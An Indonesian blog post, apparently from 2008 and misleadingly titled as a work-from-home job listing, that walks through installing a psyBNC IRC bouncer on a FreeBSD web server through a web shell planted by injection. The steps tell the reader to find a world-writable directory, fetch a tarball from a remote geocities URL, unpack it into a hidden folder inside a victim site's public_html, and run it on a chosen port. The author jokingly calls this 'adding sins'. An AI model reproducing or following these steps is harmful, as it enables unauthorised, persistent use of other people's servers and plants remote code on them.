lowongan kerja di rumah
Sabtu, 31 Mei 2008 di 14.41 |  
.
.
.
.
Dohh tanggung nihhh , mau tidurr... sempet2in posting duluu...

Ok..

Kali ini gw akan coba berikan sedikit yg gw tau ttg nge-buat PsyBNC untuk yang FreeBSD. Dan lagi2 dengan injectan tentunya .

caranya hampir sama kek yg buat linux . Dah tau dunkzz !! kalo yg blon tau N mau baca yg buat linux silahkan lihat disini .


Berhubung gw dah ngantuk jadi agak dipercepat aja yaa...



1. buka shell inject kamu , silahkan cari dir yg memberikan permission 777

2. fetch http://www.geocities.com/wisnu_amanda/psyBsd.tgz

3. tar zxfv psyBsd.tgz

4. rm -fr psyBsd.tgz

5. Tambah / masuk change dir /.psy contoh :

/home/muveszet/public_html/spaw/imagesszobor/.psy

6. ./config (PORT) contoh : ./config 2525

7. ./fuck

8. ./run

9. Selesaii !!!

Massih bingung ??!! silahkan pelajari detail nya , yang bisa kamu lihat disini


Silahkan konekin ke irc ...



Selamat "Nambah Dosa" ... !!


Saya hanya mencoba memberikan apa yg telah saya
pelajari, lakukan, buktikan. tidak ada niat untuk menggurui. saya buat yg
semudah2 nya agar teman2 yg baru belajar tidak kesulitan memahaminya.

selamat mencoba, you can do it !
Diposting oleh Admin Label:

0 komentar:







Klik Iklan Sih... Beramal Dikit Napa... hehehe..
Thanks To :
"Thanks ya atas kunjungannya

Ini cuma blog asal2an, asal jadi
Mohon maaf jika ada yang tidak
Berkenan dihati

Mohon Tinggalkan pesan
Di Box yang tersedia
Insya Allah saya akan melakukan
linkback ke blog kamu.

Terima kasih

********

wisnoee